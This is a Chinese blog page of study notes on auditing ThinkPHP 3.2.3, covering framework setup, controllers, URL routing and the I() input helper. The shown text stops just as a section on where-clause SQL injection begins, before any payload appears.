<!DOCTYPE html>
<html>
    <!-- title -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="kubo">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="kubo">
    <meta name="keywords" content="Hexo | kubo">
    <meta name="description" content="">
    <meta name="Cache-Control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>thinkphp代码审计 · kubo&#39;s blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s 1;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= /css/style.css?v=20180709 as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= /css/mobile.css?v=20180709 media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/favicon.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >kubo&#39;s blog.</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">thinkphp代码审计</a>
            </div>
    </div>
    
    <a class="home-link" href=/>kubo's blog.</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style=








height:50vh;

>
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            thinkphp代码审计
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count">8,540</span> / Reading time: <span class="post-count">35 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/08/04</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h1 id="ThinkPHP代码审计学习笔记"><a href="#ThinkPHP代码审计学习笔记" class="headerlink" title="# ThinkPHP代码审计学习笔记"></a><strong># ThinkPHP代码审计学习笔记</strong></h1><h2 id="第一章、Thinkphp环境配置与认知框架"><a href="#第一章、Thinkphp环境配置与认知框架" class="headerlink" title="第一章、Thinkphp环境配置与认知框架"></a>第一章、Thinkphp环境配置与认知框架</h2><p><strong>1.1、Thinkphp 简介和获取</strong></p>
<p>ThinkPHP  是一个快速、简单的基于 MVC  和面向对象的轻量级 PHP 开发框架，遵循 Apache2  开源协议发布，从诞生以来一直秉承简洁实用的设<br>计原则，在保持出色的性能和至简的代码的同时，尤其注重开发体验和易用性，并且拥有众多的原创功能和特性，为 WEB 应用开发提供了强有<br>力的支持<br><a href="http://www.thinkphp.cn/" target="_blank" rel="noopener">Thinkphp源码下载</a><br><a href="https://www.kancloud.cn/manual/thinkphp" target="_blank" rel="noopener">ThinkPHP3.2.3完全开发手册</a></p>
<p><strong>1.1.1、MVC讲解</strong></p>
<p>MVC  和三层结构的认识</p>
<p>MVC  可以说是一种开发模式，三层结构是一种开发习惯，严格来讲，他们两者是完全不同的概念，但是在实际开发当中又有各种联</p>
<p>系；</p>
<pre><code>MVC  是一种将视图、控制、数据三者分开的一种开发模式；

M  -  Model  模型  工作：编写 model 类，负责数据的操作

V  -  View  视图（模板）  工作：编写 html  文件，负责前台页面显示

C  -  Controller  控制器  工作：编写类文件，IndexController.class.php
</code></pre><p>参考链接：<a href="https://www.cnblogs.com/diyunfei/p/6752618.html" target="_blank" rel="noopener">https://www.cnblogs.com/diyunfei/p/6752618.html</a><br><strong>1.2、环境搭建</strong><br>首先，下载thinkphp3.2.3（完整版）源码，放到phpstudy中WWW目录下，再用浏览器访问，出现笑脸图案，之后，在Application-&gt;Common-&gt;Cof-&gt;config.php中添加如下数据库配置：<br>‘DB_TYPE’ =&gt; ‘mysql’, // 数据库类型我们是mysql，就对于的是mysql</p>
<p>‘DB_HOST’ =&gt; ‘127.0.0.1’, // 服务器地址，就是我们配置好的php服务器地址，也可以使用localhost，</p>
<pre><code>&apos;DB_NAME&apos; =&gt; &apos;text&apos;, // 数据库名：mysq创建的要连接我们项目的数据库名称

&apos;DB_USER&apos; =&gt; &apos;root&apos;, // 用户名：mysql数据库的名称

&apos;DB_PWD&apos; =&gt; &apos;&apos;, //mysql数据库的 密码

&apos;DB_PORT&apos; =&gt; 3306, // 端口服务端口一般选3306

&apos;DB_PREFIX&apos; =&gt; &apos;tp_&apos;, // 数据库表前缀

&apos;DB_CHARSET&apos;=&gt; &apos;utf8&apos;, // 字符集

&apos;DB_DEBUG&apos; =&gt; TRUE, // 数据库调试模式 开启后可以记录SQL日志 3.2.3新增
</code></pre><p>再在项目Home-&gt;Controller-&gt;IndexController.class.php中通过编写如下方法测试数据库是否连接成功：</p>
<pre><code>public function index(){

$user=M(&apos;User&apos;); //大M方法访问数据表

$sql=$user-&gt;select(); //thinkPHP 封装的SQL查询所有数据

var_dump($sql); //打印出数据

}
</code></pre><p>然后要开启页面Trace功能，需要在项目配置文件中设置：</p>
<pre><code>// 显示页面Trace信息
&apos;SHOW_PAGE_TRACE&apos; =&gt;true, 
</code></pre><p>thinkphp提供0,1，2,3，4,5共5中不同的url访问方法。<br>其中0(pathinfo法)表示如下url访问方法：</p>
<pre><code>http://localhost/ThinkPHP/index.php？m=home&amp;c=index&amp;a=test
其中m表示module(模块)，c表示controller(控制器),a表示action(方法)。
</code></pre><p>而1表示</p>
<pre><code>http://localhost/ThinkPHP/index.php/home/index/test
</code></pre><p><strong>本章总结</strong><br>本章要<strong>着重了解MVC架构</strong>，在此基础上才能很好地对thinkphp进行代码审计。</p>
<h2 id="第二章、thinkphp控制器"><a href="#第二章、thinkphp控制器" class="headerlink" title="第二章、thinkphp控制器"></a>第二章、thinkphp控制器</h2><p><strong>2.1、## 控制器和操作</strong><br>一般来说，ThinkPHP的控制器是一个类，而操作则是控制器类的一个<strong>公共方法</strong>。<br>下面就是一个典型的控制器类的定义：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">namespace Home\Controller;</span><br><span class="line">use Think\Controller;</span><br><span class="line">class IndexController extends Controller &#123;</span><br><span class="line">    public function hello()&#123;</span><br><span class="line">        echo &apos;hello,thinkphp!&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p><code>Home\IndexController</code>类就代表了Home模块下的Index控制器，而hello操作就是<code>Home\IndexController</code>类的hello（公共）方法。<br>当访问  <code>http://serverName/index.php/Home/Index/hello</code>  后会输出：</p>
<pre><code>hello,thinkphp!
</code></pre><p>2.2、## 定义控制器<br>控制器通常需要继承系统的Controller类或者其子类，例如，下面定义了一个 <code>\Home\Controller\IndexController</code> 控制器类：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">namespace Home\Controller;</span><br><span class="line">use Think\Controller;</span><br><span class="line">class IndexController extends Controller &#123;</span><br><span class="line">    public function hello()&#123;</span><br><span class="line">        echo &apos;hello&apos;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function test()&#123;</span><br><span class="line">        echo &apos;test&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>控制器的名称采用驼峰法命名（首字母大写），控制器文件位于  <code>Home/Controller/IndexController.class.php</code>。</p>
<p>IndexController控制器类的hello和test方法就是操作方法，访问下面的URL地址：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://serverName/Home/Index/hello</span><br><span class="line">http://serverName/Home/Index/test</span><br></pre></td></tr></table></figure>
<p>注意：定义控制器方法的时候，尽量避免和系统的保留方法相冲突（<code>除非你非常明确自己在做什么</code>），这些保留方法名包括但不限于：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">display</span><br><span class="line">get</span><br><span class="line">show</span><br><span class="line">fetch</span><br><span class="line">theme</span><br><span class="line">assign</span><br><span class="line">error</span><br><span class="line">success</span><br></pre></td></tr></table></figure>
<p>因为操作方法就是控制器的一个方法，所以遇到有和系统的关键字冲突的方法可能就不能定义了，这个时候我们可以设置操作方法的后缀来解决，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;ACTION_SUFFIX&apos;         =&gt;  &apos;Action&apos;, // 操作方法后缀</span><br></pre></td></tr></table></figure>
<p>设置操作方法的后缀为Action，这样，控制器的操作方法定义调整为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">namespace Home\Controller;</span><br><span class="line">use Think\Controller;</span><br><span class="line">class IndexController extends Controller &#123;</span><br><span class="line">    public function listAction()&#123;</span><br><span class="line">        echo &apos;list&apos;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function helloAction()&#123;</span><br><span class="line">        echo &apos;hello&apos;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function testAction()&#123;</span><br><span class="line">        echo &apos;test&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>操作方法的后缀设置只是影响控制器类的定义，对URL访问没有影响。</p>
</blockquote>
<p><strong>2.3、## 实例化控制器</strong></p>
<p>访问控制器的实例化通常是自动完成的，系统会根据URL地址解析出访问的控制器名称自动实例化，并且调用相关的操作方法。</p>
<p>如果你需要跨控制器调用的话，则可以单独实例化：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// 实例化Home模块的User控制器</span><br><span class="line">$User = new \Home\Controller\UserController();</span><br><span class="line">// 实例化Admin模块的Blog控制器</span><br><span class="line">$Blog = new \Admin\Controller\BlogController();</span><br></pre></td></tr></table></figure>
<p>系统为上面的控制器实例化提供了一个快捷调用方法A，上面的代码可以简化为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// 假设当前模块是Home模块</span><br><span class="line">$User = A(&apos;User&apos;); </span><br><span class="line">$Blog = A(&apos;Admin/Blog&apos;);</span><br></pre></td></tr></table></figure>
<p>默认情况下，A方法实例化的是默认控制器层（Controller），如果你要实例化其他的分层控制器的话，可以使用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// 假设当前模块是Home模块</span><br><span class="line">// 实例化Event控制器</span><br><span class="line">$User = A(&apos;User&apos;,&apos;Event&apos;); </span><br><span class="line">$Blog = A(&apos;Admin/Blog&apos;,&apos;Event&apos;);</span><br></pre></td></tr></table></figure>
<p>上面的代码等效于：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// 实例化Home模块的User事件控制器</span><br><span class="line">$User = new \Home\Event\UserEvent();</span><br><span class="line">// 实例化Admin模块的Blog事件控制器</span><br><span class="line">$Blog = new \Admin\Event\BlogEvent();</span><br></pre></td></tr></table></figure>
<p><strong>2.4、Url  访问</strong></p>
<p>1.PATHINFO 模式  http://域名/项目名/入口文件/模块名/方法名/键  1/值  1/键  2/值  2</p>
<p>2.普通模式  http://域名/项目名/入口文件?m=模块名&amp;c=控制器名&amp;a=方法名&amp;键  1=值  1&amp;键  2=值  2</p>
<p>‘URL_PARAMS_BIND’       =&gt;  true, // URL变量绑定到Action方法参数<br><strong>2.5、 前置和后置操作</strong><br>前置和后置操作指的是在执行某个操作方法之前和之后会自动调用的方法，不过仅对访问控制器有效。</p>
<blockquote>
<p>其他的分层控制器层和内部调用控制器的情况下前置和后置操作是无效的。</p>
</blockquote>
<p>系统会检测当前操作是否具有前置和后置操作，如果存在就会按照顺序执行，前置和后置操作的定义方式如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">namespace Home\Controller;</span><br><span class="line">use Think\Controller;</span><br><span class="line">class IndexController extends Controller&#123;</span><br><span class="line">    //前置操作方法</span><br><span class="line">    public function _before_index()&#123;</span><br><span class="line">        echo &apos;before&lt;br/&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    public function index()&#123;</span><br><span class="line">        echo &apos;index&lt;br/&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    //后置操作方法</span><br><span class="line">    public function _after_index()&#123;</span><br><span class="line">        echo &apos;after&lt;br/&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>如果我们访问  <code>http://serverName/index.php/Home/Index/index</code></p>
<p>结果会输出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">before</span><br><span class="line">index</span><br><span class="line">after</span><br></pre></td></tr></table></figure>
<p><strong>前置和后置操作的注意事项如下：</strong></p>
<ol>
<li>如果当前的操作并没有定义操作方法，而是直接渲染模板文件，那么如果定义了前置和后置方法的话，依然会生效。真正有模板输出的可能仅仅是当前的操作，前置和后置操作一般情况是没有任何输出的。</li>
<li>需要注意的是，在有些方法里面使用了exit或者错误输出之类的话 有可能不会再执行后置方法了。例如，如果在当前操作里面调用了控制器类的error方法，那么将不会再执行后置操作，但是不影响success方法的后置方法执行。<br>2.6、I、M、A、方法<br>I方法是ThinkPHP用于更加方便和安全的获取系统输入变量，可以用于任何地方，用法格式如下：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">I(&apos;变量类型.变量名/修饰符&apos;,[&apos;默认值&apos;],[&apos;过滤方法或正则&apos;],[&apos;额外数据源&apos;])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">变量类型</span><br><span class="line"></span><br><span class="line">含义</span><br><span class="line"></span><br><span class="line">get</span><br><span class="line"></span><br><span class="line">获取GET参数</span><br><span class="line"></span><br><span class="line">post</span><br><span class="line"></span><br><span class="line">获取POST参数</span><br><span class="line"></span><br><span class="line">param</span><br><span class="line"></span><br><span class="line">自动判断请求类型获取GET、POST或者PUT参数</span><br><span class="line"></span><br><span class="line">request</span><br><span class="line"></span><br><span class="line">获取REQUEST 参数</span><br><span class="line"></span><br><span class="line">put</span><br><span class="line"></span><br><span class="line">获取PUT 参数</span><br><span class="line"></span><br><span class="line">session</span><br><span class="line"></span><br><span class="line">获取 $_SESSION 参数</span><br><span class="line"></span><br><span class="line">cookie</span><br><span class="line"></span><br><span class="line">获取 $_COOKIE 参数</span><br><span class="line"></span><br><span class="line">server</span><br><span class="line"></span><br><span class="line">获取 $_SERVER 参数</span><br><span class="line"></span><br><span class="line">globals</span><br><span class="line"></span><br><span class="line">获取 $GLOBALS参数</span><br><span class="line"></span><br><span class="line">path</span><br><span class="line"></span><br><span class="line">获取 PATHINFO模式的URL参数</span><br><span class="line"></span><br><span class="line">data</span><br><span class="line"></span><br><span class="line">获取 其他类型的参数，需要配合额外数据源参数</span><br><span class="line"></span><br><span class="line">&gt; 注意：变量类型不区分大小写，变量名则严格区分大小写。  </span><br><span class="line">&gt; 默认值和过滤方法均属于可选参数。</span><br></pre></td></tr></table></figure>
<p>我们以GET变量类型为例，说明下I方法的使用：</p>
<pre><code>echo I(&apos;get.id&apos;); // 相当于 $_GET[&apos;id&apos;]
echo I(&apos;get.name&apos;); // 相当于 $_GET[&apos;name&apos;]
</code></pre><p>支持默认值：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo I(&apos;get.id&apos;,0); // 如果不存在$_GET[&apos;id&apos;] 则返回0</span><br><span class="line">echo I(&apos;get.name&apos;,&apos;&apos;); // 如果不存在$_GET[&apos;name&apos;] 则返回空字符串</span><br></pre></td></tr></table></figure>
<p>采用方法过滤：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// 采用htmlspecialchars方法对$_GET[&apos;name&apos;] 进行过滤，如果不存在则返回空字符串</span><br><span class="line">echo I(&apos;get.name&apos;,&apos;&apos;,&apos;htmlspecialchars&apos;);</span><br></pre></td></tr></table></figure>
<p>支持直接获取整个变量类型，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// 获取整个$_GET 数组</span><br><span class="line">I(&apos;get.&apos;);</span><br></pre></td></tr></table></figure>
<h2 id="变量修饰符"><a href="#变量修饰符" class="headerlink" title="变量修饰符"></a>变量修饰符</h2><p>最新版本的I函数支持对变量使用修饰符功能，可以更方便的通过类型过滤变量。</p>
<p>用法如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">I(&apos;变量类型.变量名/修饰符&apos;)</span><br></pre></td></tr></table></figure>
<p>例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">I(&apos;get.id/d&apos;); // 强制变量转换为整型</span><br><span class="line">I(&apos;post.name/s&apos;); // 强制转换变量为字符串类型</span><br><span class="line">I(&apos;post.ids/a&apos;); // 强制变量转换为数组类型</span><br></pre></td></tr></table></figure>
<p>可以使用的修饰符包括：</p>
<pre><code>修饰符

作用

s

强制转换为字符串类型

d

强制转换为整型类型

b

强制转换为布尔类型

a

强制转换为数组类型

f

强制转换为浮点类型
</code></pre><p>**</p>
<h2 id="3-1-常规注入"><a href="#3-1-常规注入" class="headerlink" title="3.1 常规注入"></a>3.1 常规注入</h2><p><strong>
</strong>3.1.1 Thinkphp where注入**</p>
<h2 id="WHERE方法"><a href="#WHERE方法" class="headerlink" title="WHERE方法"></a>WHERE方法</h2><p>where方法的用法是ThinkPHP查询语言的精髓，也是ThinkPHP ORM的重要组成部分和亮点所在，可以完成包括普通查询、表达式查询、快捷查询、区间查询、组合查询在内的查询操作。where方法的参数支持字符串和数组，虽然也可以使用对象但并不建议。</p>
<h3 id="字符串条件"><a href="#字符串条件" class="headerlink" title="字符串条件"></a>字符串条件</h3><p>使用字符串条件直接查询和操作，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$User = M(&quot;User&quot;); // 实例化User对象</span><br><span class="line">$User-&gt;where(&apos;type=1 AND status=1&apos;)-&gt;select();</span><br></pre></td></tr></table></figure>
<p>最后生成的SQL语句是</p>
